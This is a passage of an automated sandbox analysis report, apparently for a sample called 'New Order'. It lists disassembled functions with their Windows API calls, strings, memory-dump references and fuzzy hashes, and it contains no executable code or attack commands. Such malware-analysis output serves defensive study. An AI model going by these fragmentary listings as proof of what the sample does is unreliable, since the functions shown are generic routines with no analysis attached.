Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d34fe897bc7553ba647d7604a24554f748f0aa8bb3abe5172f1bcb8e87861f2a
Instruction ID: 4bcab9666435ca275b535f807b596e58cf022547880f268affca2c0541346cf8
Opcode Fuzzy Hash: d34fe897bc7553ba647d7604a24554f748f0aa8bb3abe5172f1bcb8e87861f2a
Instruction Fuzzy Hash: 5A219C75504305AFEF269F29DC94A9A7BB8BF46724F204A19F8A1E72E0D7709940CF60

Function 003305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003305C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00330601

Strings

nul, xrefs: 00330639

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 2a5bf4099e1add84fc4d23552ea2f0db7549f6507f14245bc6f3708dd54f2283
Instruction ID: d1385c17728a529ab93284c0d1008f07f3cac1e54f5465071873d867108d032e
Opcode Fuzzy Hash: 2a5bf4099e1add84fc4d23552ea2f0db7549f6507f14245bc6f3708dd54f2283
Instruction Fuzzy Hash: 8621B2755003059FDB269F69CC95A9A77E8FF85B34F200A19F8A1E72E4D77098A0CB50

Function 003540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C604C
Part of subcall function 002C600E: GetStockObject.GDI32(00000011), ref: 002C6060
Part of subcall function 002C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 002C606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00354112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0035411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0035412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00354139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00354145

Strings

Msctls_Progress32, xrefs: 003540E3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 04cc4bcb4d9df381ad38d1e56fdd23889f6a215ee13f5b32b02edf473bbecbb7
Instruction ID: 94770057cc9a43ac45feea49517dec219d31ac8dc82d7c1258334abafc7b2900
Opcode Fuzzy Hash: 04cc4bcb4d9df381ad38d1e56fdd23889f6a215ee13f5b32b02edf473bbecbb7
Instruction Fuzzy Hash: FD11B6B11502197EEF119F64CC85EE77F5DEF08798F114111FA18A6160C672DC61DBA4

Function 002FD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002FD7A3: _free.LIBCMT ref: 002FD7CC

_free.LIBCMT ref: 002FD82D

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002FD838
_free.LIBCMT ref: 002FD843
_free.LIBCMT ref: 002FD897
_free.LIBCMT ref: 002FD8A2
_free.LIBCMT ref: 002FD8AD
_free.LIBCMT ref: 002FD8B8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 390f328d141d738d1eb9eb151106cc3887f8dc712381c467247a5b243bd71a9a
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 881151715A0B0CEAD521BFB0CC47FEBFBDD6F01780F400835B399AA0A2DA65B5254E50

Function 0032DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0032DA74
LoadStringW.USER32(00000000), ref: 0032DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0032DA91
LoadStringW.USER32(00000000), ref: 0032DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0032DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0032DAB9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a392d5fe11515104e47e98a3adb004b2022f64da292eb8cc19eb01607d9d5452
Instruction ID: 9ec6084ea3224e394367256859f2ae33e8b17cbe1dd8d34bb12781031402e733
Opcode Fuzzy Hash: a392d5fe11515104e47e98a3adb004b2022f64da292eb8cc19eb01607d9d5452
Instruction Fuzzy Hash: A50186F69103187FE712EBA49D89EEB336CE70830AF405492F746E2051EA749E848F74

Function 0033096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(015AEF80,015AEF80), ref: 0033097B
EnterCriticalSection.KERNEL32(015AEF60,00000000), ref: 0033098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0033099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003309A9
CloseHandle.KERNEL32(00000000), ref: 003309B8
InterlockedExchange.KERNEL32(015AEF80,000001F6), ref: 003309C8
LeaveCriticalSection.KERNEL32(015AEF60), ref: 003309CF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: bcef4cb2bb317f99c4870d450773ff11416377de7707c84b7e26578029650ac9
Instruction ID: 26c6e7756f168d7b97826898245dbb4b339abbfa98f2515105ee0610dbadcc2f
Opcode Fuzzy Hash: bcef4cb2bb317f99c4870d450773ff11416377de7707c84b7e26578029650ac9
Instruction Fuzzy Hash: 1CF01932452B02AFDB465BA4EE88BDABA39FF01706F402425F202908B0CB7494A5CF90

Function 00341C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00341DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00341DE1
WSAGetLastError.WSOCK32 ref: 00341DF2
htons.WSOCK32(?,?,?,?,?), ref: 00341EDB
inet_ntoa.WSOCK32(?), ref: 00341E8C

Part of subcall function 003239E8: _strlen.LIBCMT ref: 003239F2

Part of subcall function 00343224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0033EC0C), ref: 00343240

_strlen.LIBCMT ref: 00341F35

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 4814bab3d9e23455ff13caa6d3c5f3fd219597a1cb04a85701faa5a397c72c97
Instruction ID: 7b8f4044a96698bd9ec3b2b9523dae4e95350ef193ece37a2772695a66e33d64
Opcode Fuzzy Hash: 4814bab3d9e23455ff13caa6d3c5f3fd219597a1cb04a85701faa5a397c72c97
Instruction Fuzzy Hash: 56B1BB31204740AFC325DF24C885F2ABBE5AF85318F558A4CF45A5F2A2DB31ED86CB91

Function 002F01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002F00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F00D6
__allrem.LIBCMT ref: 002F00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F010B
__allrem.LIBCMT ref: 002F0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F0140

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 6adfc773f2c5cf30fbcc5d6786abb0b257e2c6ecf08516990c7dee03744ea4ca
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 33812B7262070A9BEB209F69CC81B7BF3E89F413A0F14453DF615D66C2EB70D9208B50

Function 002F61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002E82D9,002E82D9,?,?,?,002F644F,00000001,00000001,8BE85006), ref: 002F6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002F644F,00000001,00000001,8BE85006,?,?,?), ref: 002F62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002F63D8
__freea.LIBCMT ref: 002F63E5

Part of subcall function 002F3820: RtlAllocateHeap.NTDLL(00000000,?,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6,?,002C1129), ref: 002F3852

__freea.LIBCMT ref: 002F63EE
__freea.LIBCMT ref: 002F6413

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5cf8dfc6e3066b5d4237bd1d69919670838d1a9d350e2e04eb45f5d53607b4c8
Instruction ID: 216ad0482ceb25dcba00bb92105d5fca5638cf31cafd5441b88e1bb5e64f1fcc
Opcode Fuzzy Hash: 5cf8dfc6e3066b5d4237bd1d69919670838d1a9d350e2e04eb45f5d53607b4c8
Instruction Fuzzy Hash: DF51F57262021BABDB258FA4CC89EBFB7A9EB44B90F144279FE05D6140DB34DC64C760

Function 0034BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 0034C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0034B6AE,?,?), ref: 0034C9B5
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034C9F1
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA68
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0034BD25
RegCloseKey.ADVAPI32(00000000), ref: 0034BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0034BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0034BDF3
RegCloseKey.ADVAPI32(?), ref: 0034BDFF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 29cbb2b319b7bb5ba0a62975112ff8f9e453ea51e37cc1f680140b8e25e321c1
Instruction ID: 6b74e3b5353799e1bea486b82bc4dbe0e45ded6646bc0d7c21a4cc1e5ccf60de
Opcode Fuzzy Hash: 29cbb2b319b7bb5ba0a62975112ff8f9e453ea51e37cc1f680140b8e25e321c1
Instruction Fuzzy Hash: E9819C30218241AFC715DF24C885E2ABBE9FF85308F14899CF4594F2A2DB31ED55CB92

Function 0031F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0031F7B9
SysAllocString.OLEAUT32(00000001), ref: 0031F860
VariantCopy.OLEAUT32(0031FA64,00000000), ref: 0031F889
VariantClear.OLEAUT32(0031FA64), ref: 0031F8AD
VariantCopy.OLEAUT32(0031FA64,00000000), ref: 0031F8B1
VariantClear.OLEAUT32(?), ref: 0031F8BB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 2ceb2a35b221b63aa7ec2e337989389d1960f5cddb5cef66208d2625b59658fa
Instruction ID: 1f4ed706bfd96626baa0f891c622a0c72da67c033eea9f10eb73df1258146d3f
Opcode Fuzzy Hash: 2ceb2a35b221b63aa7ec2e337989389d1960f5cddb5cef66208d2625b59658fa
Instruction Fuzzy Hash: A851F931510310BFCF1ABB65D895BA9B3A8EF4D310F24956BE806DF291DB708C80CB96

Function 0033910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 002C7620: _wcslen.LIBCMT ref: 002C7625

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 003394E5
_wcslen.LIBCMT ref: 00339506
_wcslen.LIBCMT ref: 0033952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00339585

Strings

X, xrefs: 00339412

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 9d1592ffd434836ed67888a42d8031c9c5a18835fe3213aa9b8c163ee3d8fa18
Instruction ID: fafeff12f5630c428ad6e6a475d4d6df63229964dcbb9177cbda823c2279d4ee
Opcode Fuzzy Hash: 9d1592ffd434836ed67888a42d8031c9c5a18835fe3213aa9b8c163ee3d8fa18
Instruction Fuzzy Hash: D4E18D31618340CFD715EF24C881F6AB7E4AF85314F058A6EE8899B2A2DB70DD55CF92

Function 002D920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

BeginPaint.USER32(?,?,?), ref: 002D9241
GetWindowRect.USER32(?,?), ref: 002D92A5
ScreenToClient.USER32(?,?), ref: 002D92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002D92D3
EndPaint.USER32(?,?,?,?,?), ref: 002D9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003171EA

Part of subcall function 002D9339: BeginPath.GDI32(00000000), ref: 002D9357

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 7c5eca0f5ee8d6464352bddd17b20532a1343cc57116ad9d73d5abd39361cf3d
Instruction ID: a5dedb3cf2d6594715cee9059bf859a09dc52707095b40b643dfe90c3b707d8d
Opcode Fuzzy Hash: 7c5eca0f5ee8d6464352bddd17b20532a1343cc57116ad9d73d5abd39361cf3d
Instruction Fuzzy Hash: 2641DE31128301AFD712DF24CC84FBA7BB8EB49325F14066AF9A4972B1C7719C95DB61

Function 003307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0033080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00330847
EnterCriticalSection.KERNEL32(?), ref: 00330863
LeaveCriticalSection.KERNEL32(?), ref: 003308DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003308F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00330921

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 61be7b8036ee4cc96f38aa03ae4a00693aa784b525a82bf6ba82b35e9aa540cf
Instruction ID: 1fbbedc050a1766af639b43c751c73532fe5ce7828549689ef13efb732462fad
Opcode Fuzzy Hash: 61be7b8036ee4cc96f38aa03ae4a00693aa784b525a82bf6ba82b35e9aa540cf
Instruction Fuzzy Hash: AE416871910205EFDF1AAF54DCC5A6AB7B8FF04304F1440A5ED059E2A6DB30DE61DBA4

Function 003581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0031F3AB,00000000,?,?,00000000,?,0031682C,00000004,00000000,00000000), ref: 0035824C
EnableWindow.USER32(00000000,00000000), ref: 00358272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 003582D1
ShowWindow.USER32(00000000,00000004), ref: 003582E5
EnableWindow.USER32(00000000,00000001), ref: 0035830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0035832F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0450f7801eb9d3ac8683170fa0b84e9bddf43da020fd483508993e99a33adb90
Instruction ID: 91fdb4c547bc7ae2938056ca93aec9568fe1b464dd30f3bea27e8fa3b2080555
Opcode Fuzzy Hash: 0450f7801eb9d3ac8683170fa0b84e9bddf43da020fd483508993e99a33adb90
Instruction Fuzzy Hash: 2A41A434601745AFDB13CF15C895FA47BF4BB09716F195169E908AB272CB32A849CB90

Function 00324C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00324C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00324CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00324CEA
_wcslen.LIBCMT ref: 00324D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00324D10
_wcsstr.LIBVCRUNTIME ref: 00324D1A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: f12d5f8a2c314b046881e974c066e9ef272a806641915452641bd2e9af0028ca
Instruction ID: 1b3029907c5ead526fffa9142c3ebd88137d57ff1fe5d5559103ea6fa1321192
Opcode Fuzzy Hash: f12d5f8a2c314b046881e974c066e9ef272a806641915452641bd2e9af0028ca
Instruction Fuzzy Hash: 59210B31204360BFEB175B39FC49E7BBBACDF45750F15803AF805DA1A2EA61DD1096A0

Function 0033581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

